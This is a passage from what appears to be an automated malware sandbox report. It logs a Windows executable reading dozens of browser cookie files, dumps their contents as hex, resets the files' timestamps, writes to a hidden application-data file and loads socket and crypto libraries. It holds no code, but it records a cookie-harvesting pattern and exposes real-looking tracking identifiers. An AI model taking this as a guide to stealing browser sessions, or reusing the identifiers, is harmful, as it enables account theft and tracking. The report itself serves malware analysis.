C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt none 169 75 0A 34 65 64 37 66 30 66 62 63 37 62 36 64 0A 61 64 2E 77 73 6F 64 2E 63 6F 6D 2F 0A 31 30 32 34 0A 34 32 31 34 36 35 36 0A 33 30 31 39 37 39 36 34 0A 34 36 37 34 30 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A 69 5F 31 0A 33 33 3A 32 33 37 33 3A 31 32 32 35 3A 30 3A 30 3A 35 37 37 32 35 3A 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt none 228 75 69 64 0A 34 65 64 37 65 36 61 30 38 34 33 62 62 61 64 63 0A 61 64 64 74 68 69 73 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 39 32 39 32 36 34 38 39 36 0A 33 30 33 33 38 37 37 34 0A 34 36 35 35 31 36 32 38 38 0A 33 30 31 39 31 37 32 32 0A 2A 0A 75 76 63 0A 33 7C 34 38 0A 61 64 64 74 68 69 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt none 232 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 30 32 32 37 39 33 35 36 7C 73 65 73 73 69 6F 6E 23 31 33 30 32 32 37 39 32 34 30 39 31 38 2D 39 35 32 36 31 35 23 31 33 30 32 32 38 31 31 35 36 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 31 38 34 39 37 36 38 34 34 38 0A 33 30 31 34 34 30 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt none 232 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 32 31 30 31 31 39 36 32 7C 73 65 73 73 69 6F 6E 23 31 33 32 31 30 31 31 39 30 31 36 37 39 2D 32 31 30 36 33 34 23 31 33 32 31 30 31 33 37 36 32 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 32 39 31 31 31 35 33 34 30 38 0A 33 30 31 38 37 36 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt none 102 4D 55 49 44 0A 39 37 41 30 45 44 32 45 45 39 33 35 34 37 33 44 38 37 46 43 37 45 37 30 37 32 35 45 45 30 35 37 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 32 38 35 30 36 31 36 33 32 0A 33 30 31 38 34 33 38 33 0A 32 37 31 36 30 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt none 101 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 33 33 31 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt none 189 4D 55 49 44 0A 33 43 41 41 41 32 42 34 37 42 36 42 36 44 32 39 31 45 45 30 41 30 30 46 37 38 36 42 36 44 43 44 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 34 38 32 30 30 30 38 39 36 0A 33 30 33 33 38 33 39 39 0A 32 36 33 31 34 32 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt none 190 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 39 37 37 35 36 30 35 37 36 0A 33 30 33 33 38 35 36 39 0A 32 32 35 39 31 39 37 33 36 30 0A 33 30 31 39 31 37 31 35 0A 2A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt none 291 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A 53 52 43 48 44 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt none 204 53 52 43 48 55 53 52 0A 41 55 54 4F 52 45 44 49 52 3D 30 26 47 45 4F 56 41 52 3D 26 44 4F 42 3D 32 30 31 31 30 35 32 33 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 36 32 36 33 35 32 36 34 0A 33 30 32 39 39 38 39 31 0A 32 33 35 38 38 35 34 37 35 32 0A 33 30 31 35 33 30 33 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt none 197 53 52 43 48 44 0A 4D 53 3D 32 30 36 30 34 38 36 26 44 3D 32 30 36 30 34 36 31 26 41 46 3D 4D 53 4E 30 30 35 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 34 37 32 38 35 34 39 31 32 0A 33 30 33 33 38 35 37 38 0A 34 36 37 34 30 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A 53 52 43 48 55 53 52 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt none 208 53 52 4D 5F 41 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 63 2E 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 39 37 37 35 36 30 35 37 36 0A 33 30 33 33 38 35 36 39 0A 32 32 35 39 31 39 37 33 36 30 0A 33 30 31 39 31 37 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt none 210 53 52 4D 5F 41 0A 31 42 45 32 35 42 38 39 31 36 39 43 36 37 32 38 32 46 33 39 35 39 33 32 31 32 39 43 36 37 44 41 0A 63 2E 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 31 32 39 37 37 35 36 38 30 30 0A 33 30 33 33 38 35 37 35 0A 32 35 39 33 31 34 33 35 38 34 0A 33 30 31 39 31 37 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt none 69 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 34 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt none 68 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 32 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 30 38 37 30 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt none 67 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 35 36 34 30 33 34 38 31 36 0A 33 30 31 34 34 37 35 34 0A 32 37 33 34 38 31 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt none 68 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 30 34 38 36 32 32 30 38 0A 33 30 31 39 32 33 32 37 0A 32 36 31 35 30 32 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt none 83 50 4F 50 55 50 43 48 45 43 4B 0A 31 33 30 32 33 36 35 36 33 31 36 36 38 0A 63 68 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 38 38 0A 34 39 31 32 31 31 31 33 36 0A 33 30 31 34 34 32 30 39 0A 34 30 38 31 32 38 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@disqus[2].txt none 584 64 69 73 71 75 73 5F 75 6E 69 71 75 65 0A 39 37 38 37 38 38 39 36 33 38 38 30 0A 64 69 73 71 75 73 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 36 33 36 33 36 37 34 38 38 0A 33 30 32 36 35 31 34 37 0A 36 31 35 30 35 36 32 38 38 0A 33 30 31 39 31 37 32 32 0A 2A 0A 5F 5F 75 74 6D 61 0A 34 30 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[1].txt none 96 61 69 64 0A 43 33 66 64 61 36 36 35 63 31 31 31 31 30 37 31 38 34 37 36 37 36 33 32 35 35 36 0A 64 6D 74 72 79 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 37 30 34 36 36 33 31 36 38 0A 33 30 32 36 34 39 34 32 0A 32 34 35 30 32 39 37 33 36 30 0A 33 30 31 39 31 37 31 35 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[2].txt none 88 61 69 64 0A 43 30 66 63 31 36 34 36 63 31 31 31 31 30 32 31 36 31 32 38 36 38 31 36 35 32 34 0A 64 6D 74 72 79 2E 63 6F 6D 2F 0A 31 30 32 34 0A 37 34 34 39 39 30 32 30 38 0A 33 30 32 36 34 39 35 32 0A 34 37 31 37 38 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt none 223 69 64 0A 63 38 32 63 64 65 37 33 37 30 30 30 30 65 31 7C 7C 74 3D 31 33 30 36 31 36 30 34 33 35 7C 65 74 3D 37 33 30 7C 63 73 3D 30 30 32 32 31 33 66 64 34 38 37 62 33 34 64 34 31 38 37 66 65 61 32 31 66 61 0A 64 6F 75 62 6C 65 63 6C 69 63 6B 2E 6E 65 74 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@exp.www.msn[1].txt none 137 65 78 70 72 63 0A 69 64 3D 32 33 30 36 39 62 63 36 65 36 32 31 34 61 30 32 61 33 64 64 36 30 32 65 34 35 36 66 36 36 36 39 26 62 64 3D 32 30 31 31 2D 31 32 2D 30 31 54 32 30 3A 31 37 3A 33 38 2E 38 34 39 26 76 3D 32 0A 65 78 70 2E 77 77 77 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 32 35 32 38 38 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt none 88 69 30 30 0A 30 31 37 62 34 64 61 30 32 33 39 36 65 62 35 31 30 30 30 36 0A 69 76 77 62 6F 78 2E 64 65 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 36 35 36 30 35 35 30 34 0A 33 30 32 31 37 35 37 36 0A 32 36 39 34 34 39 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt none 99 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 33 34 36 39 33 37 36 33 32 0A 33 30 31 34 34 30 30 38 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt none 100 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 32 35 34 31 33 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt none 108 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 64 34 62 32 32 37 62 34 35 61 38 36 34 61 63 39 38 65 33 36 61 39 34 63 64 61 39 64 64 36 35 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 34 30 34 34 37 31 34 39 32 38 0A 33 30 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt none 108 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 62 30 37 65 34 37 39 62 30 37 66 36 34 65 62 30 39 66 62 62 65 64 36 66 38 66 62 31 36 66 64 33 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 35 34 31 38 34 31 36 30 30 0A 33 30 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt none 108 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 39 35 61 30 63 63 36 61 31 63 39 38 34 39 64 33 61 65 30 32 31 35 37 34 31 33 62 35 38 65 36 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 31 37 31 30 34 34 37 35 32 0A 33 30 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt none 455 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 36 64 61 34 34 66 64 61 33 33 65 61 34 61 32 39 38 34 65 66 64 30 66 33 34 66 32 30 38 34 35 35 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 34 30 34 39 35 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt none 387 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 34 64 33 30 63 39 34 63 62 30 62 35 34 62 31 35 62 36 30 65 35 39 37 38 33 62 35 32 32 64 38 62 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 35 35 37 34 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt none 521 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 32 31 34 64 38 30 63 64 33 30 33 38 34 36 65 37 38 30 32 61 63 34 62 34 63 62 33 65 37 31 32 64 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 32 38 34 37 30 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@oldapps[2].txt none 353 5F 5F 75 74 6D 61 0A 31 35 36 32 31 31 39 34 30 2E 31 31 32 32 33 35 34 36 33 34 2E 31 33 32 32 37 37 32 31 31 30 2E 31 33 32 32 37 37 32 31 31 30 2E 31 33 32 32 37 37 32 31 31 30 2E 31 0A 6F 6C 64 61 70 70 73 2E 63 6F 6D 2F 0A 31 36 30 30 0A 38 30 37 36 39 31 33 39 32 0A 33 30 33 33 38 35 37 33 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@quantserve[1].txt none 98 6D 63 0A 34 65 64 37 65 63 30 38 2D 39 39 31 31 62 2D 34 37 35 33 38 2D 61 33 39 37 39 0A 71 75 61 6E 74 73 65 72 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 39 39 38 34 32 38 31 36 0A 33 30 35 35 39 32 35 34 0A 36 38 34 35 38 36 32 38 38 0A 33 30 31 39 31 37 32 32 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@questionmarket[2].txt none 160 6C 69 6E 6B 6A 75 6D 70 74 65 73 74 0A 31 0A 71 75 65 73 74 69 6F 6E 6D 61 72 6B 65 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 30 36 30 35 33 34 31 34 34 0A 33 30 31 39 31 37 33 36 0A 34 37 30 36 31 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A 4C 50 0A 31 33 32 32 37 37 34 37 38 30 0A 71 75 65 73 74 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt none 115 55 49 44 0A 32 39 30 36 32 66 37 32 2D 39 35 2E 31 30 30 2E 32 34 39 2E 31 33 30 2D 31 33 30 32 33 34 30 35 30 36 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 34 30 31 38 39 36 37 30 34 0A 33 30 32 39 31 30 30 31 0A 32 36 36 30 35 39 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt none 113 55 49 44 0A 31 61 37 62 62 64 63 38 2D 32 31 32 2E 32 34 33 2E 31 35 32 2E 31 36 30 2D 31 33 30 32 32 37 39 32 33 30 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 37 37 32 35 32 37 33 36 0A 33 30 32 39 30 38 35 39 0A 33 32 37 37 31 37 36 33 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt none 205 55 49 44 0A 39 35 64 64 64 30 65 2D 36 39 2E 32 32 2E 31 33 38 2E 31 33 39 2D 31 33 32 32 37 37 33 32 36 34 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 36 38 31 39 35 36 33 35 32 0A 33 30 33 33 36 35 36 33 0A 32 35 30 35 36 34 33 35 38 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@twitter[1].txt none 96 70 69 64 0A 76 31 25 33 41 31 33 32 32 37 37 32 31 33 31 39 31 39 32 36 31 38 33 32 34 34 30 0A 74 77 69 74 74 65 72 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 35 35 38 36 33 36 38 30 0A 33 30 33 33 38 36 37 30 0A 33 30 31 34 32 33 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt none 90 69 30 30 0A 37 35 34 39 34 64 39 66 33 34 33 64 32 64 62 36 30 30 30 31 0A 77 65 6D 66 62 6F 78 2E 63 68 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 38 31 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 38 30 36 35 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt none 111 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 34 45 46 44 37 36 44 38 33 37 43 33 34 42 31 43 39 37 44 44 42 30 38 41 36 44 46 37 30 44 45 43 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 35 33 36 0A 33 38 35 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 39 38 31 35 34 39 32 38 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt none 117 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 42 42 35 44 31 42 30 35 36 35 30 34 34 41 45 43 42 37 45 44 41 35 35 38 37 30 44 39 39 38 39 34 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 36 32 36 33 35 32 36 34 0A 33 30 32 39 39 38 39 31 0A 32 33 35 38 35 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[2].txt none 229 65 78 70 61 63 0A 33 36 30 49 49 33 62 33 39 5F 31 31 30 32 3A 54 31 7E 34 30 49 49 33 61 33 39 5F 30 38 30 33 3A 57 50 31 30 5F 32 7C 0A 77 77 77 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 32 30 34 36 36 35 39 38 34 0A 33 30 31 39 32 33 32 31 0A 32 31 32 32 33 32 37 33 36 30 0A 33 30 31 39 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[3].txt none 211 63 62 63 0A 53 57 50 32 32 3A 62 61 6E 3A 31 33 32 35 33 36 34 2C 73 75 62 69 6E 74 3A 31 3A 31 33 32 32 38 35 38 34 38 2C 64 69 73 70 63 6F 75 6E 74 3A 31 3A 31 33 32 33 31 31 37 36 38 0A 77 77 77 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 38 38 0A 32 32 35 32 36 35 38 36 38 38 0A 33 30 33 33 38 35 37 32 success or wait 1 1491C56
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi PositionInformation Offset: 0 success or wait 5 1491CD5
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\rsaenh.dll query and read commit 2B00000 208896 own pid readonly success or wait 1
C:\WINDOWS\system32\rsaenh.dll query and read commit 2B00000 208896 own pid readonly success or wait 1
\KnownDlls\rsaenh.dll write and read and execute unknown 2B00000 208896 own pid readonly object name not found 1
C:\WINDOWS\system32\rsaenh.dll query and write and read and execute image 68000000 221184 own pid read write success or wait 1
C:\WINDOWS\system32\rsaenh.dll query and read commit 2B00000 208896 own pid readonly success or wait 1
unknown query and write and read commit F40000 16384 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 16384 own pid read write success or wait 1
C:\WINDOWS\system32\hnetcfg.dll write and read and execute commit 2900000 344064 own pid execute success or wait 1
C:\WINDOWS\system32\hnetcfg.dll write and read and execute commit 2900000 344064 own pid execute success or wait 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 2940000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 2940000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit F40000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit F40000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe query and read commit 2940000 258048 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe query and read commit 2940000 258048 own pid readonly success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 28C0000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 28C0000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 28C0000 159744 own pid execute success or wait 1
unknown query and write and read commit F40000 16384 own pid read write success or wait 1
unknown query and write and read commit F40000 4096 own pid readonly success or wait 1
unknown query and write and read commit F40000 4096 own pid readonly success or wait 1
unknown query and write and read commit F40000 4096 own pid readonly success or wait 1
Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
